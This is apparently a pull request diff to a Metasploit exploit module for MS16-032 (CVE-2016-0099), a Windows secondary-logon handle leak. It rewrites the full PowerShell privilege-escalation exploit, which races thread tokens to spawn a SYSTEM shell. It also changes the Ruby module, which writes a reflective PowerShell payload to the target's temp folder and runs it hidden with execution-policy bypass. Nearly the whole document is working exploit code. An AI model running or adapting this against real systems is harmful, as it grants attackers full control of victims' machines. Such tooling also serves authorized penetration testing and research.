### PR TITLE
Fix exploit/windows/local/ms16_032_secondary_logon_handle_privesc

### DIFF
--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -1,347 +1,370 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
 
-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName
 
-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
 
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero
 
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
 
-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
 
-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}

--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -354,6 +354,7 @@
 			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
 			$StartTokenRace.Stop()
 			$SafeGuard.Stop()
+			echo "$end"
 			Return
 		}
 			

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -63,10 +63,6 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options(
       [
         OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
-        OptBool.new(  'DRY_RUN', [false, 'Only show what would be done', false ]),
-        # How long until we DELETE file, we have a race condition here, so anything less than 60
-        # seconds might break
-        OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
       ])
   end
 
@@ -97,37 +93,32 @@ class MetasploitModule < Msf::Exploit::Local
 
     cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
 
-    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+    payload_arch = framework.payloads.create(datastore['PAYLOAD']).arch.first
+
+    if sysinfo['Architecture'] == ARCH_X64 && payload_arch == ARCH_X86
       cmdstr.gsub!("System32", "SYSWOW64")
       print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
       vprint_warning("#{cmdstr}")
     end
 
-    # payload formatted to fit dropped text file
-    payl = cmd_psh_payload(payload.encoded,payload.arch.first,{
-      encode_final_payload: false,
-      remove_comspec: true,
-      method: 'old'
-    })
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)
 
-    payl.sub!(/.*?(?=New-Object IO)/im, "")
-    payl = payl.split("';$s.")[0]
-    payl.gsub!("''","'")
-    payl = "$s=#{payl}while($true){Start-Sleep 1000};"
+    psh_payload = compress_script(psh_payload)
 
-    @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
-    path = datastore['W_PATH'] || pwd
+    @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".ps1"
+    path = datastore['W_PATH'] || expand_path('%TEMP%')
     @upfile = "#{path}\\#{@upfile}"
     fd = session.fs.file.new(@upfile,"wb")
     print_status("Writing payload file, #{@upfile}...")
-    fd.write(payl)
+    fd.write(psh_payload)
     fd.close
-    psh_cmd = "IEX `$(gc #{@upfile})"
+    psh_cmd = " -exec Bypass -nonI -window Hidden #{@upfile}"
 
     #lpAppName
     ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
     #lpcommandLine - capped at 1024b
-    ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
+    ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
 
     print_status('Compressing script contents...')
     ms16_032_c = compress_script(ms16_032)
@@ -141,35 +132,38 @@ class MetasploitModule < Msf::Exploit::Local
       print_good("Compressed size: #{ms16_032_c.size}")
     end
 
-    if datastore['DRY_RUN']
-      print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
-      return
+    print_status("Executing exploit script...")
+
+    cmd = expand_path('%windir%')
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      cmd += "\\Sysnative"
+    else
+      cmd += "\\System32"
     end
 
-    print_status("Executing exploit script...")
-    cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
+    cmd += "\\windowspowershell\\v1.0\\powershell.exe -exec Bypass -nonI -window Hidden \"#{ms16_032_c}\""
+
     args = nil
 
     begin
-      process = session.sys.process.execute(cmd, args, {
+      r = session.sys.process.execute(cmd, args, {
         'Hidden' => true,
-        'Channelized' => false
+        'Channelized' => true
       })
+
+      while(d = r.channel.read)
+        print(d)
+      end
+      r.channel.close
+      r.close
+
+      print_good("Executed on target machine.")
+
+      rm_f(@upfile)
+
+      print_good("Deleted #{@upfile}")
     rescue
       print_error("An error occurred executing the script.")
-    end
-  end
-
-  def cleanup
-    sleep_t = datastore['TIMEOUT']
-    vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
-    sleep sleep_t
-
-    begin
-      rm_f(@upfile)
-      print_good("Cleaned up #{@upfile}")
-    rescue
-      print_error("There was an issue with cleanup of the powershell payload script.")
     end
   end
 end

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -14,6 +14,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Process
   include Msf::Post::File
   include Msf::Post::Windows::ReflectiveDLLInjection
+  include Msf::Post::Windows::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -71,6 +72,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     if os !~ /win/i
       # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+    
+    res = psh_exec 'if($([System.Environment]::ProcessorCount) -gt 1) { echo("true") }'
+    unless res.include? 'true'
+      vprint_error 'Target system has an insufficient number of processor cores'
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
